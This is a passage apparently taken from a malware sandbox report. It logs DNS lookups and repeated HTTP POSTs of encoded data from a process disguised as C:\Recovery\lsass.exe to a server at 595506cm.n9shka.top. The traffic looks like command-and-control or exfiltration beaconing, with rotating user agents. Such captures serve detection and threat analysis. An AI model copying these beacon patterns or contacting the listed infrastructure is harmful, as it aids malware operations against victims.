                                      Dec 6, 2024 01:42:31.856879950 CET4973780192.168.2.437.44.238.250
                                      Dec 6, 2024 01:42:38.542577982 CET4973880192.168.2.437.44.238.250
                                      Dec 6, 2024 01:42:38.664133072 CET804973837.44.238.250192.168.2.4
                                      Dec 6, 2024 01:42:38.666713953 CET4973880192.168.2.437.44.238.250
                                      Dec 6, 2024 01:42:38.667047024 CET4973880192.168.2.437.44.238.250
                                      Dec 6, 2024 01:42:38.787513018 CET804973837.44.238.250192.168.2.4
                                      Dec 6, 2024 01:42:39.023827076 CET4973880192.168.2.437.44.238.250
                                      Dec 6, 2024 01:42:39.139106035 CET804973837.44.238.250192.168.2.4
                                      Dec 6, 2024 01:42:39.938740969 CET804973837.44.238.250192.168.2.4
                                      Dec 6, 2024 01:42:39.992268085 CET4973880192.168.2.437.44.238.250
                                      Dec 6, 2024 01:42:40.173212051 CET804973837.44.238.250192.168.2.4
                                      Dec 6, 2024 01:42:40.226671934 CET4973880192.168.2.437.44.238.250
                                      Dec 6, 2024 01:42:40.368282080 CET4973880192.168.2.437.44.238.250
                                      Dec 6, 2024 01:42:51.756654978 CET4973980192.168.2.437.44.238.250
                                      Dec 6, 2024 01:42:51.876230955 CET804973937.44.238.250192.168.2.4
                                      Dec 6, 2024 01:42:51.876316071 CET4973980192.168.2.437.44.238.250
                                      Dec 6, 2024 01:42:51.876773119 CET4973980192.168.2.437.44.238.250
                                      Dec 6, 2024 01:42:51.994138002 CET804973937.44.238.250192.168.2.4
                                      Dec 6, 2024 01:42:52.226881981 CET4973980192.168.2.437.44.238.250
                                      Dec 6, 2024 01:42:52.346642017 CET804973937.44.238.250192.168.2.4
                                      Dec 6, 2024 01:42:53.176539898 CET804973937.44.238.250192.168.2.4
                                      Dec 6, 2024 01:42:53.226682901 CET4973980192.168.2.437.44.238.250
                                      Dec 6, 2024 01:42:53.413290024 CET804973937.44.238.250192.168.2.4
                                      Dec 6, 2024 01:42:53.461067915 CET4973980192.168.2.437.44.238.250
                                      Dec 6, 2024 01:42:53.758647919 CET4973980192.168.2.437.44.238.250
                                      Dec 6, 2024 01:43:05.129630089 CET4976280192.168.2.437.44.238.250
                                      Dec 6, 2024 01:43:05.250463963 CET804976237.44.238.250192.168.2.4
                                      Dec 6, 2024 01:43:05.250830889 CET4976280192.168.2.437.44.238.250
                                      Dec 6, 2024 01:43:05.251240015 CET4976280192.168.2.437.44.238.250
                                      Dec 6, 2024 01:43:05.369225979 CET804976237.44.238.250192.168.2.4
                                      Dec 6, 2024 01:43:05.602046013 CET4976280192.168.2.437.44.238.250
                                      Dec 6, 2024 01:43:05.717174053 CET804976237.44.238.250192.168.2.4
                                      Dec 6, 2024 01:43:06.552253008 CET804976237.44.238.250192.168.2.4
                                      Dec 6, 2024 01:43:06.601727962 CET4976280192.168.2.437.44.238.250
                                      Dec 6, 2024 01:43:06.785408974 CET804976237.44.238.250192.168.2.4
                                      Dec 6, 2024 01:43:06.836121082 CET4976280192.168.2.437.44.238.250
                                      Dec 6, 2024 01:43:07.005018950 CET4976280192.168.2.437.44.238.250
                                      Dec 6, 2024 01:43:13.654747963 CET4978180192.168.2.437.44.238.250
                                      Dec 6, 2024 01:43:13.771229029 CET804978137.44.238.250192.168.2.4
                                      Dec 6, 2024 01:43:13.771328926 CET4978180192.168.2.437.44.238.250
                                      Dec 6, 2024 01:43:13.771759033 CET4978180192.168.2.437.44.238.250
                                      Dec 6, 2024 01:43:13.892128944 CET804978137.44.238.250192.168.2.4
                                      Dec 6, 2024 01:43:14.117568970 CET4978180192.168.2.437.44.238.250
                                      Dec 6, 2024 01:43:14.239295959 CET804978137.44.238.250192.168.2.4
                                      Dec 6, 2024 01:43:15.043996096 CET804978137.44.238.250192.168.2.4
                                      Dec 6, 2024 01:43:15.086183071 CET4978180192.168.2.437.44.238.250
                                      Dec 6, 2024 01:43:15.297533989 CET804978137.44.238.250192.168.2.4
                                      Dec 6, 2024 01:43:15.351798058 CET4978180192.168.2.437.44.238.250
                                      Dec 6, 2024 01:43:15.525300980 CET4978180192.168.2.437.44.238.250
                                      Dec 6, 2024 01:43:22.115838051 CET4980180192.168.2.437.44.238.250
                                      Dec 6, 2024 01:43:22.230952024 CET804980137.44.238.250192.168.2.4
                                      Dec 6, 2024 01:43:22.231034040 CET4980180192.168.2.437.44.238.250
                                      Dec 6, 2024 01:43:22.231400967 CET4980180192.168.2.437.44.238.250
                                      Dec 6, 2024 01:43:22.349409103 CET804980137.44.238.250192.168.2.4
                                      Dec 6, 2024 01:43:22.586354017 CET4980180192.168.2.437.44.238.250
                                      Dec 6, 2024 01:43:22.707000971 CET804980137.44.238.250192.168.2.4
                                      Dec 6, 2024 01:43:23.535892010 CET804980137.44.238.250192.168.2.4
                                      Dec 6, 2024 01:43:23.586177111 CET4980180192.168.2.437.44.238.250
                                      Dec 6, 2024 01:43:23.769431114 CET804980137.44.238.250192.168.2.4
                                      Dec 6, 2024 01:43:23.820552111 CET4980180192.168.2.437.44.238.250
                                      Dec 6, 2024 01:43:24.140199900 CET4980180192.168.2.437.44.238.250
                                      Dec 6, 2024 01:43:31.376931906 CET4982380192.168.2.437.44.238.250
                                      Dec 6, 2024 01:43:31.491947889 CET804982337.44.238.250192.168.2.4
                                      Dec 6, 2024 01:43:31.492028952 CET4982380192.168.2.437.44.238.250
                                      Dec 6, 2024 01:43:31.492314100 CET4982380192.168.2.437.44.238.250
                                      Dec 6, 2024 01:43:31.609966040 CET804982337.44.238.250192.168.2.4
                                      Dec 6, 2024 01:43:31.852133989 CET4982380192.168.2.437.44.238.250
                                      Dec 6, 2024 01:43:31.967112064 CET804982337.44.238.250192.168.2.4
                                      Dec 6, 2024 01:43:32.761173964 CET804982337.44.238.250192.168.2.4
                                      Dec 6, 2024 01:43:32.804997921 CET4982380192.168.2.437.44.238.250
                                      Dec 6, 2024 01:43:32.993482113 CET804982337.44.238.250192.168.2.4
                                      Dec 6, 2024 01:43:33.039338112 CET4982380192.168.2.437.44.238.250
                                      Dec 6, 2024 01:43:33.192466974 CET4982380192.168.2.437.44.238.250
                                      Dec 6, 2024 01:43:39.922027111 CET4984480192.168.2.437.44.238.250
                                      Dec 6, 2024 01:43:40.039762974 CET804984437.44.238.250192.168.2.4
                                      Dec 6, 2024 01:43:40.039865017 CET4984480192.168.2.437.44.238.250
                                      Dec 6, 2024 01:43:40.040225029 CET4984480192.168.2.437.44.238.250
                                      Dec 6, 2024 01:43:40.158046007 CET804984437.44.238.250192.168.2.4
                                      Dec 6, 2024 01:43:40.398958921 CET4984480192.168.2.437.44.238.250
                                      Dec 6, 2024 01:43:40.519561052 CET804984437.44.238.250192.168.2.4
                                      Dec 6, 2024 01:43:41.333076000 CET804984437.44.238.250192.168.2.4
                                      Dec 6, 2024 01:43:41.383131027 CET4984480192.168.2.437.44.238.250
                                      Dec 6, 2024 01:43:41.565629005 CET804984437.44.238.250192.168.2.4
                                      Dec 6, 2024 01:43:41.617464066 CET4984480192.168.2.437.44.238.250
                                      Dec 6, 2024 01:43:41.829552889 CET4984480192.168.2.437.44.238.250
                                      Dec 6, 2024 01:43:52.686722994 CET4987280192.168.2.437.44.238.250
                                      Dec 6, 2024 01:43:52.801738024 CET804987237.44.238.250192.168.2.4
                                      Dec 6, 2024 01:43:52.801824093 CET4987280192.168.2.437.44.238.250
                                      Dec 6, 2024 01:43:52.802166939 CET4987280192.168.2.437.44.238.250
                                      Dec 6, 2024 01:43:52.926929951 CET804987237.44.238.250192.168.2.4
                                      Dec 6, 2024 01:43:53.149029016 CET4987280192.168.2.437.44.238.250
                                      Dec 6, 2024 01:43:53.270814896 CET804987237.44.238.250192.168.2.4
                                      Dec 6, 2024 01:43:54.078912020 CET804987237.44.238.250192.168.2.4
                                      Dec 6, 2024 01:43:54.133125067 CET4987280192.168.2.437.44.238.250
                                      Dec 6, 2024 01:43:54.314062119 CET804987237.44.238.250192.168.2.4
                                      Dec 6, 2024 01:43:54.367511034 CET4987280192.168.2.437.44.238.250
                                      Dec 6, 2024 01:43:54.970590115 CET4987280192.168.2.437.44.238.250
                                      TimestampSource PortDest PortSource IPDest IP
                                      Dec 6, 2024 01:42:16.083574057 CET5554553192.168.2.41.1.1.1
                                      Dec 6, 2024 01:42:16.409004927 CET53555451.1.1.1192.168.2.4
                                      Dec 6, 2024 01:42:29.353069067 CET5415353192.168.2.41.1.1.1
                                      Dec 6, 2024 01:42:29.491080999 CET53541531.1.1.1192.168.2.4
                                      TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                      Dec 6, 2024 01:42:16.083574057 CET192.168.2.41.1.1.10xe4e0Standard query (0)595506cm.n9shka.topA (IP address)IN (0x0001)false
                                      Dec 6, 2024 01:42:29.353069067 CET192.168.2.41.1.1.10xb812Standard query (0)595506cm.n9shka.topA (IP address)IN (0x0001)false
                                      TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                      Dec 6, 2024 01:42:16.409004927 CET1.1.1.1192.168.2.40xe4e0No error (0)595506cm.n9shka.top37.44.238.250A (IP address)IN (0x0001)false
                                      Dec 6, 2024 01:42:29.491080999 CET1.1.1.1192.168.2.40xb812No error (0)595506cm.n9shka.top37.44.238.250A (IP address)IN (0x0001)false
                                      • 595506cm.n9shka.top
                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                      0192.168.2.44973437.44.238.250801368C:\Recovery\lsass.exe
                                      TimestampBytes transferredDirectionData
                                      Dec 6, 2024 01:42:16.532170057 CET350OUTPOST /BigloadgeneratortraffictestDatalifeTemp.php HTTP/1.1
                                      Content-Type: application/x-www-form-urlencoded
                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60
                                      Host: 595506cm.n9shka.top
                                      Content-Length: 336
                                      Expect: 100-continue
                                      Connection: Keep-Alive
                                      Dec 6, 2024 01:42:16.883887053 CET336OUTData Raw: 05 06 01 01 06 00 01 00 05 06 02 01 02 05 01 07 00 0a 05 0b 02 03 03 0e 03 0f 0f 50 06 53 01 55 0d 02 04 0c 03 00 04 01 0d 03 07 05 07 01 04 00 07 02 0f 59 0e 05 05 0a 04 57 05 05 04 56 07 08 01 00 0a 0e 05 03 05 00 0c 50 0d 06 0d 0d 0e 01 05 50
                                      Data Ascii: PSUYWVPPPRT\L~k^XNvqiLuKRkRetlhhMpJ{|{Ho^vh}kPw|N~_~V@zmz~_y
                                      Dec 6, 2024 01:42:17.851090908 CET25INHTTP/1.1 100 Continue
                                      Dec 6, 2024 01:42:18.085515022 CET376INHTTP/1.1 404 Not Found
                                      Server: nginx
                                      Date: Fri, 06 Dec 2024 00:42:17 GMT
                                      Content-Type: text/html; charset=UTF-8
                                      Content-Length: 213
                                      Connection: keep-alive
                                      Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 0d 0a 0d 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e
                                      Data Ascii: <html><head><meta http-equiv="content-type" content="text/html; charset=UTF-8"><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>


                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                      1192.168.2.44973737.44.238.250803412C:\Recovery\lsass.exe
                                      TimestampBytes transferredDirectionData
                                      Dec 6, 2024 01:42:29.878978968 CET350OUTPOST /BigloadgeneratortraffictestDatalifeTemp.php HTTP/1.1
                                      Content-Type: application/x-www-form-urlencoded
                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60
                                      Host: 595506cm.n9shka.top
                                      Content-Length: 336
                                      Expect: 100-continue
                                      Connection: Keep-Alive
                                      Dec 6, 2024 01:42:30.226990938 CET336OUTData Raw: 00 03 04 07 03 0c 01 00 05 06 02 01 02 05 01 0a 00 04 05 0d 02 06 03 01 00 00 0f 01 07 07 00 02 0d 55 06 00 01 0c 07 01 0b 00 07 07 00 07 05 02 07 02 0c 5e 0c 57 04 57 06 55 04 50 04 00 00 0e 03 06 0f 5e 07 00 07 02 0f 05 0c 54 0f 00 0f 06 06 03
                                      Data Ascii: U^WWUP^TWRU\L~kpi[ca}Mae`O~liL`RRhMs_oRoxYi_}}sS`w]j_~V@{CbOey
                                      Dec 6, 2024 01:42:31.150566101 CET25INHTTP/1.1 100 Continue
                                      Dec 6, 2024 01:42:31.385164022 CET376INHTTP/1.1 404 Not Found
                                      Server: nginx
                                      Date: Fri, 06 Dec 2024 00:42:30 GMT
                                      Content-Type: text/html; charset=UTF-8
                                      Content-Length: 213
                                      Connection: keep-alive
                                      Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 0d 0a 0d 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e
                                      Data Ascii: <html><head><meta http-equiv="content-type" content="text/html; charset=UTF-8"><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>


                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                      2192.168.2.44973837.44.238.250805804C:\Recovery\lsass.exe
                                      TimestampBytes transferredDirectionData
                                      Dec 6, 2024 01:42:38.667047024 CET350OUTPOST /BigloadgeneratortraffictestDatalifeTemp.php HTTP/1.1
                                      Content-Type: application/x-www-form-urlencoded
                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 Edg/95.0.1020.53
                                      Host: 595506cm.n9shka.top
                                      Content-Length: 328
                                      Expect: 100-continue
                                      Connection: Keep-Alive
                                      Dec 6, 2024 01:42:39.023827076 CET328OUTData Raw: 05 05 01 05 03 0b 04 02 05 06 02 01 02 05 01 03 00 03 05 0b 02 00 03 08 03 0e 0e 06 04 0e 01 50 0c 03 07 09 00 06 04 04 0b 02 07 01 07 03 07 06 04 51 0c 5d 0d 50 04 05 04 53 03 05 06 56 04 09 01 02 0d 0b 07 06 04 01 0e 05 0c 57 0a 07 0f 00 05 03
                                      Data Ascii: PQ]PSVW_WV\L~|`Xt[uBbeRhjYtopOk]^KolwxzJSUvt|Lje~V@B{}v__y
                                      Dec 6, 2024 01:42:39.938740969 CET25INHTTP/1.1 100 Continue
                                      Dec 6, 2024 01:42:40.173212051 CET376INHTTP/1.1 404 Not Found
                                      Server: nginx
                                      Date: Fri, 06 Dec 2024 00:42:39 GMT
                                      Content-Type: text/html; charset=UTF-8
                                      Content-Length: 213
                                      Connection: keep-alive
                                      Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 0d 0a 0d 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e
                                      Data Ascii: <html><head><meta http-equiv="content-type" content="text/html; charset=UTF-8"><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>


                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                      3192.168.2.44973937.44.238.250801432C:\Recovery\lsass.exe
                                      TimestampBytes transferredDirectionData
                                      Dec 6, 2024 01:42:51.876773119 CET333OUTPOST /BigloadgeneratortraffictestDatalifeTemp.php HTTP/1.1
                                      Content-Type: application/x-www-form-urlencoded
                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                                      Host: 595506cm.n9shka.top
                                      Content-Length: 344
                                      Expect: 100-continue
                                      Connection: Keep-Alive
                                      Dec 6, 2024 01:42:52.226881981 CET344OUTData Raw: 00 04 04 07 06 0d 01 06 05 06 02 01 02 0d 01 07 00 07 05 0a 02 04 03 0e 03 0f 0e 54 06 53 06 05 0d 00 04 0c 03 03 07 05 0b 0b 05 04 05 07 06 0f 05 0a 0c 0f 0d 05 04 02 04 02 06 01 01 07 05 5f 02 50 0f 0d 07 54 07 07 0c 54 0b 0f 0f 0d 0e 54 06 54
                                      Data Ascii: TS_PTTTTU\L}P|a\trr\vu]ThRe`B{^|]cYylxsvD}oRcY`}e~V@{}fO}ri
                                      Dec 6, 2024 01:42:53.176539898 CET25INHTTP/1.1 100 Continue
                                      Dec 6, 2024 01:42:53.413290024 CET376INHTTP/1.1 404 Not Found
                                      Server: nginx
                                      Date: Fri, 06 Dec 2024 00:42:52 GMT
                                      Content-Type: text/html; charset=UTF-8
                                      Content-Length: 213
                                      Connection: keep-alive
                                      Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 0d 0a 0d 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e
                                      Data Ascii: <html><head><meta http-equiv="content-type" content="text/html; charset=UTF-8"><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>


                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                      4192.168.2.44976237.44.238.250803896C:\Recovery\lsass.exe
                                      TimestampBytes transferredDirectionData
                                      Dec 6, 2024 01:43:05.251240015 CET297OUTPOST /BigloadgeneratortraffictestDatalifeTemp.php HTTP/1.1
                                      Content-Type: application/x-www-form-urlencoded
                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0
                                      Host: 595506cm.n9shka.top
                                      Content-Length: 344
                                      Expect: 100-continue
                                      Connection: Keep-Alive
                                      Dec 6, 2024 01:43:05.602046013 CET344OUTData Raw: 00 04 04 03 03 0f 01 02 05 06 02 01 02 04 01 0b 00 05 05 0c 02 06 03 0c 03 56 0d 50 06 54 06 08 0e 00 07 09 03 02 03 05 0c 06 07 04 07 57 04 02 07 04 0e 09 0c 57 06 06 04 0e 06 02 07 05 00 0c 02 01 0f 0b 05 52 04 54 0c 07 0e 02 0c 07 0c 55 05 57
                                      Data Ascii: VPTWWRTUWRSV\L~pPMcan]wv`hRi`B^BkcZxlsH{yX|SsPcgZ~_~V@@z}n}\a
                                      Dec 6, 2024 01:43:06.552253008 CET25INHTTP/1.1 100 Continue
                                      Dec 6, 2024 01:43:06.785408974 CET376INHTTP/1.1 404 Not Found
                                      Server: nginx
                                      Date: Fri, 06 Dec 2024 00:43:05 GMT
                                      Content-Type: text/html; charset=UTF-8
                                      Content-Length: 213
                                      Connection: keep-alive
                                      Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 0d 0a 0d 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e
                                      Data Ascii: <html><head><meta http-equiv="content-type" content="text/html; charset=UTF-8"><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>


                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                      5192.168.2.44978137.44.238.250805144C:\Recovery\lsass.exe
                                      TimestampBytes transferredDirectionData
                                      Dec 6, 2024 01:43:13.771759033 CET297OUTPOST /BigloadgeneratortraffictestDatalifeTemp.php HTTP/1.1
                                      Content-Type: application/x-www-form-urlencoded
                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0
                                      Host: 595506cm.n9shka.top
                                      Content-Length: 344
                                      Expect: 100-continue
                                      Connection: Keep-Alive
                                      Dec 6, 2024 01:43:14.117568970 CET344OUTData Raw: 00 0a 01 05 03 0d 04 01 05 06 02 01 02 06 01 00 00 01 05 0d 02 03 03 0a 02 01 0a 01 04 03 01 02 0a 02 03 09 07 01 06 00 0e 06 07 54 05 07 07 0f 03 0a 0c 59 0a 01 01 0a 04 04 04 0d 06 00 07 5a 03 02 0c 0f 07 53 07 04 0b 04 0e 54 0f 56 0e 01 07 01
                                      Data Ascii: TYZSTVYPWQ\L}Rsb`buae|~e`RYMsXxBlcvIhm{Pcdle~V@BxC~~Ly
                                      Dec 6, 2024 01:43:15.043996096 CET25INHTTP/1.1 100 Continue
                                      Dec 6, 2024 01:43:15.297533989 CET376INHTTP/1.1 404 Not Found
                                      Server: nginx
                                      Date: Fri, 06 Dec 2024 00:43:14 GMT
                                      Content-Type: text/html; charset=UTF-8
                                      Content-Length: 213
                                      Connection: keep-alive
                                      Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 0d 0a 0d 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e
                                      Data Ascii: <html><head><meta http-equiv="content-type" content="text/html; charset=UTF-8"><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>


                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                      6192.168.2.44980137.44.238.250803964C:\Recovery\lsass.exe
                                      TimestampBytes transferredDirectionData
                                      Dec 6, 2024 01:43:22.231400967 CET333OUTPOST /BigloadgeneratortraffictestDatalifeTemp.php HTTP/1.1
                                      Content-Type: application/x-www-form-urlencoded
                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                                      Host: 595506cm.n9shka.top
                                      Content-Length: 344
                                      Expect: 100-continue
                                      Connection: Keep-Alive
                                      Dec 6, 2024 01:43:22.586354017 CET344OUTData Raw: 00 02 01 06 06 01 01 04 05 06 02 01 02 07 01 02 00 06 05 0c 02 0d 03 0a 00 56 0e 00 04 0e 03 57 0c 00 04 01 00 56 04 50 0e 50 05 0a 04 05 04 56 04 06 0d 0c 0f 57 06 07 01 0e 05 0c 04 0a 04 0f 00 07 0d 00 05 56 06 08 0b 00 0e 02 0f 00 0d 03 04 54
                                      Data Ascii: VWVPPVWVTPP\L}T`P@`}buwR|Rut`h]w^yxXlz|CxAwo_iO~V@Axmbby
                                      Dec 6, 2024 01:43:23.535892010 CET25INHTTP/1.1 100 Continue
                                      Dec 6, 2024 01:43:23.769431114 CET376INHTTP/1.1 404 Not Found
                                      Server: nginx
                                      Date: Fri, 06 Dec 2024 00:43:22 GMT
                                      Content-Type: text/html; charset=UTF-8
                                      Content-Length: 213
                                      Connection: keep-alive
                                      Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 0d 0a 0d 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e
                                      Data Ascii: <html><head><meta http-equiv="content-type" content="text/html; charset=UTF-8"><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>


                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                      7192.168.2.44982337.44.238.250804128C:\Recovery\lsass.exe
                                      TimestampBytes transferredDirectionData
                                      Dec 6, 2024 01:43:31.492314100 CET285OUTPOST /BigloadgeneratortraffictestDatalifeTemp.php HTTP/1.1
                                      Content-Type: application/x-www-form-urlencoded
                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0
                                      Host: 595506cm.n9shka.top
                                      Content-Length: 344
                                      Expect: 100-continue
                                      Connection: Keep-Alive
                                      Dec 6, 2024 01:43:31.852133989 CET344OUTData Raw: 05 05 04 02 06 0c 04 00 05 06 02 01 02 01 01 04 00 0b 05 0f 02 0d 03 00 03 00 0f 56 04 57 01 57 0f 00 04 0d 07 0d 03 04 0b 07 06 04 05 01 05 0f 03 05 0f 01 0f 55 07 0a 01 03 03 01 05 01 04 58 05 07 0a 0b 04 01 07 51 0b 02 0f 04 0f 01 0d 02 04 07
